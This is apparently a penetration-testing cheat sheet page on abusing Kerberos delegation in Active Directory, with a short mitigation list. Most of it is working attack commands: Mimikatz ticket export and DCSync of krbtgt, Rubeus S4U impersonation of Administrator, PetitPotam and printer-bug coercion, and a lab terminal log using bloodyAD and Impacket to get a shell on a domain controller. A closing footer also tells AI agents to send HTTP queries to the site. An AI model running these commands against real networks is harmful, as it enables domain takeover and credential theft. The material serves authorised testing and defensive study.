# Trustee and Resource Delegation [![ko-fi](https://ko-fi.com/img/githubbutton_sm.svg)](https://ko-fi.com/Y8Y41FQ2GA) {% embed url="" %} {% embed url="" %} {% embed url="" %} ## Delegations {% embed url="" %} ## ADeleginator {% embed url="" %} ## NXC ``` nxc ldap 192.168.56.11 -u eddard.stark -p FightP3aceAndHonor! --find-delegation ```

## SharpADWS {% embed url="" %} ## Unconstrained Delegation **Unconstrained Delegation:** allows the first hop server to request access to any service on any computer in the domain {% embed url="" %} {% embed url="" %} ### Discovery * PowerView ```powershell Get-DomainComputer -UnConstrained ``` * AD Module ```powershell Get-ADComputer -Filter {TrustedForDelegation -eq $True} Get-ADUser -Filter {TrustedForDelegation -eq $True} ``` ### Compromise the server where unconstrained delegation is enabled Wait for a DA to connect then ```powershell Invoke-Mimikatz -Command '"sekurlsa::tickets /export"' ``` ### Reuse DA token ```powershell Invoke-Mimikatz -Command '"kerberos::ptt C:\path\to\[****]-*****-Administrator@krbtgt-DOMAIN.LOCAL.kirbi"' ``` ### Trick a high user to connect to a machine with Unconstrained Delegation ? Printer Bug {% content-ref url="/pages/FPIbdosGSrSHYzhw5i4w" %} [Misconfiguration](/0xss0rz/pentest/internal-pentest/misconfiguration.md) {% endcontent-ref %} {% content-ref url="/pages/cTCsQDwQ23z6bHQN0fbR" %} [Print Spooler](/0xss0rz/pentest/internal-pentest/print-spooler.md) {% endcontent-ref %} {% embed url="" %} {% hint style="success" %} *Printerbug also works across a Two-way forest trust with TGT Delegation enabled - See* [*Trusts*](/0xss0rz/pentest/internal-pentest/trusts.md) {% endhint %} Capture the TGT of `dc$` by using Rubeus on victim server ```powershell Rubeus.exe monitor /interval:5 /nowrap ``` Printerbug - Run MS-RPRN.exe {% embed url="" %} {% embed url="" %} ```powershell MS-RPRN.exe \\dc.domain.local \\vicitm.domain.local # Victim host Rubeus.exe monitor /interval:5 /nowrap ``` Or with PetitPotam {% embed url="" %} ```powershell .\PetitPotam.exe victim-hostname # Victim host Rubeus.exe monitor /interval:5 /nowrap ``` On Linux, use Coercer {% content-ref url="/pages/3jW53CaRXMUs4f8szugL" %} [SMB (445, 139) / RPC](/0xss0rz/pentest/protocols/smb-445-139-rpc.md) {% endcontent-ref %} ShadowCoerce or DFSCoerce can also be used {% embed url="" %} {% embed url="" %} Copy the base64 encoded TGT and remove extra spaces before use it ```powershell Rubeus.exe ptt /ticket: ``` Or use Invoke-Mimikatz: ```powershell [IO.File]::WriteAllBytes("C:\AD\Tools\USDC.kirbi", [Convert]::FromBase64String("ticket_from_Rubeus_monitor")) Invoke-Mimikatz -Command '"kerberos::ptt C:\path\to\ticket.kirbi"' ``` Run DCSync ```powershell Invoke-Mimikatz -Command '"lsadump::dcsync /user:domain\krbtgt"' ``` {% content-ref url="/pages/xnKTwmiIoj8HdMcJZAjp" %} [DCSync](/0xss0rz/pentest/internal-pentest/dcsync.md) {% endcontent-ref %} ### Mitigation The following security controls should be implemented to mitigate unconstrained delegation: * **Ensure computer objects are not configured for unconstrained delegation.** If delegation is required for a computer object, use resource-based constrained delegation instead. * **Ensure privileged user objects are configured as ‘sensitive and cannot be delegated’.** This can be configured by using the ‘Account is sensitive and cannot be delegated’ option on the user object in Active Directory Users and Computers. * **Ensure privileged user objects are members of the** [**Protected Users security group**](https://learn.microsoft.com/en-au/windows-server/security/credentials-protection-and-management/protected-users-security-group)**.** Members of this security group cannot be delegated. * **Disable the Print Spooler service on Domain Controllers.** This prevents the Print Spooler service from being used to coerce a Domain Controller into authenticating to another system. ## Constrained Delegation - Protocol Transition **Constrained Delegation:** allows the first hop server to request access only to specified computers **Service for User (S4U)** used to impersonate a user **S4U2self:** allows a forwardable TGS to itself on behalf of a user - `TUSTED_TO_AUTHENTICATE_FOR_DELEGATION` **S4U2proxy:** allows a service to obtain a TGS to a second service on behalf of the user - `msDS-AllowedToDelegateTo` contains a list of SPN to which the token can be forwarded ### Discovery * PowerView ```powershell Get-DomainUser -TrustedToAuth Get-DomainComputer -TrustedToAuth ``` * AD Module ```powershell Get-ADObject -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo ``` ### Abusing with kekeo password or NTLM/AES keys required 1. Request a TGT ```powershell kekeo# tgt::ask /user:victim_user /domain:domain.local /rc4: ``` 2. Request a TGS ```powershell kekeo# tgs::s4u /tgt:.kirbi /user:Administrator@domain.local /service:cifs/mssql.domain.LOCAL ``` ```powershell kekeo# tgs::s4u /tgt:.kirbi /user:Administrator@domain.local /service:cifs/mssql.domain.LOCAL|HTTP/mssql.domain.LOCAL ``` 3. Inject the ticket ```powershell Invoke-Mimikatz -Command '"kerberos:ptt .kirbi"' ``` ```powershell ls \\mssql.domain.local\c$ ``` ```powershell Invoke-Command -ScriptBlock{whoami} -ComputerName mssql.domain.local ``` ### Abusing with Rubeus Request TGT and TGS in a single command ```powershell Rubeus.exe s4u /user:victim_user /aes256: /impersonateuser:Administrator /msdsspn:CIFS/mssql.domain.LOCAL /ptt ``` ```powershell ls \\mssql.domain.local\c$ ``` {% hint style="success" %} *The delegation occurs not only for the specified service but for any service running under the same account. No validation for the SPN specified* {% endhint %} With rc4 ```powershell Rubeus.exe s4u /user:appsvc /rc4: /impersonateuser:administrator /msdsspn:CIFS/mssql.domain.local /altservice:HTTP /domain:domain.local /ptt winrs -r:umssql-hostname cmd.exe ``` ### Abusing with kekeo password or NTLM/AES keys required 1. Request a TGT ```powershell kekeo# tgt::ask /user:victim_machine_account$ /domain:domain.local /rc4: ``` 2. Request a TGS ```powershell kekeo# tgs::s4u /tgt:.kirbi /user:Administrator@domain.local /service:time/dc.domain.LOCAL|ldap/dc.domain.LOCAL ``` 3. Inject the ticket ```powershell Invoke-Mimikatz -Command '"kerberos:ptt .kirbi"' ``` ```powershell Invoke-Mimikatz -Command '"lsadump::dcsync /user:domain\krbtgt"' ``` ### Abusing with Rubeus Request TGT and TGS in a single command ```powershell Rubeus.exe s4u /user:victim_machine_account$ /aes256: /impersonateuser:Administrator /msdsspn:time/dc.domain.LOCAL /altservice:ldap /ptt ``` ```powershell SafetyKatz.exe "lsadump::dcsync /user:domain\krbtgt" "exit" ``` ### Persistence - msDS-AllowedToDelegateTo {% content-ref url="/pages/tUeIS9njvbJvwoJzaw5v" %} [Persistence](/0xss0rz/pentest/internal-pentest/persistence.md) {% endcontent-ref %} ## Resource-based Constrained Delegation {% embed url="" %} {% embed url="" %} Instead of SPNs on `msDS-AllowedToDelegatTo` on the front end service, access is control by a security descriptor of `msDS-AllowedToActOnBehalfOfOtherIdentity` (visible as `PrincipalsAllowedToDelegateToAccount`) on the resource/service The service administrator can configure this delegation whereas for other type `SeEnableDelagation` privs required - by default only DA **Two privileges needed to abuse RBCD:** 1. **Write permissions** over the target service 2. Control over an object which as SPN configured (like admin access do a domain joined machine or ability to join a machine to domain - ms-DS- MachineAccountQuota is 10 by default) ### Write Permission ```powershell Find-InterestingDomainACL | ?{$_.identityreferencename -match 'username'} ``` ### Exploit Configure RBCD ```powershell $comps = 'computer1$','computer2$' Set-ADComputer -Identity victim -PrincipalsAllowedToDelegateToAccount $comps ``` Extract AES keys for computerx$ ```powershell Invoke-Mimikatz -Command '"sekurlsa::ekeys"' ``` Use the AES key and access vicitm as ANY user we want ```powershell Rubeus.exe s4u /user:computer1$ /aes256: /msdsspn:http/victim /impersonateuser:administrator /ptt ``` ```powershell winrs -r:victim cmd.exe ``` ### With Impacket

L.BIANCHI\_ADM is a DA ``` ┌──(kali㉿kali)-[~/Desktop/bloodyAD] └─$ ./bloodyAD.py --host dc01.domain.htb --dc-ip 10.10.11.45 -d "DOMAIN.HTB" -u user -p 'password' -k add groupMember "DELEGATEDADMINS" "SVC_LDAP" [+] SVC_LDAP added to DELEGATEDADMINS ┌──(kali㉿kali)-[~/Desktop/bloodyAD] └─$ ./bloodyAD.py --host dc01.domain.htb -d "DOMAIN.HTB" --dc-ip 10.10.11.45 -k set object "SVC_LDAP" servicePrincipalName -v "cifs/fake" [+] SVC_LDAP's servicePrincipalName has been updated ┌──(kali㉿kali)-[~/Desktop/bloodyAD] └─$ impacket-getTGT domain.htb/svc_ldap:password -dc-ip dc01.domain.htb Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies [*] Saving ticket in svc_ldap.ccache ┌──(kali㉿kali)-[~/Desktop/bloodyAD] └─$ export KRB5CCNAME=svc_ldap.ccache ┌──(kali㉿kali)-[~/Desktop/bloodyAD] └─$ impacket-getST -spn 'cifs/dc01.domain.htb' -impersonate L.BIANCHI_ADM -dc-ip 10.10.11.45 -k 'domain.htb/svc_ldap:password' Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies [*] Impersonating L.BIANCHI_ADM [*] Requesting S4U2self [*] Requesting S4U2Proxy [*] Saving ticket in L.BIANCHI_ADM@cifs_dc01.domain.htb@DOMAIN.HTB.ccache ┌──(kali㉿kali)-[~/Desktop/bloodyAD] └─$ export KRB5CCNAME=L.BIANCHI_ADM@cifs_dc01.domain.htb@DOMAIN.HTB.ccache ┌──(kali㉿kali)-[~/Desktop/bloodyAD] └─$ impacket-wmiexec -k -no-pass DOMAIN.HTB/L.BIANCHI_ADM@dc01.domain.htb Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies [*] SMBv3.0 dialect used [!] Launching semi-interactive shell - Careful what you execute [!] Press help for extra shell commands C:\>type Users\Administrator\Desktop\root.txt ``` ## Constrained Delegation - Kerberos Only Leverage RBCD to abuse Kerberos Only configuration ### Enumeration ```powershell # AD Module Get-ADObject -Filter {msDS-AllowedToDelegateTo -ne "$null"} -PropertiesmsDS-AllowedToDelegateTo ``` ### Create a new machine account ```powershell Powermad.ps1 New-MachineAccount -MachineAccount studentcompX ``` ### Configure RBCD ```powershell # On victim host Rubeus.exe asktgt /user:victim$ /aes256: /impersonateuser:administrator /domain:domain.local /ptt /nowrap # With AD Module Set-ADComputer -Identity victim$ -PrincipalsAllowedToDelegateToAccount studentcompX$ -Verbose ``` ### Get TGS ```powershell # Get hash Rubeus.exe hash/password:P@ssword@123 Rubeus.exe s4u /impersonateuser:administrator /user:studentcompX$ /rc4: /msdsspn:cifs/victim.domain.local /nowrap ``` ### Request a new forwardable TGS ```powershell Rubeus.exe s4u /tgs: /user:victim$ /aes256: /msdsspn:cifs/mssql.domain.local /altservice:http /nowrap /ptt winrs -r:mssql.domain.local cmd.exe ``` ## Support this Gitbook I hope it helps you as much as it has helped me. If you can support me in any way, I would deeply appreciate it. [![ko-fi](https://ko-fi.com/img/githubbutton_sm.svg)](https://ko-fi.com/Y8Y41FQ2GA) [![buymeacoffee](https://cdn.buymeacoffee.com/buttons/v2/default-yellow.png)](https://buymeacoffee.com/0xss0rz) --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://0xss0rz.gitbook.io/0xss0rz/pentest/internal-pentest/trustee-and-resource-delegation.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.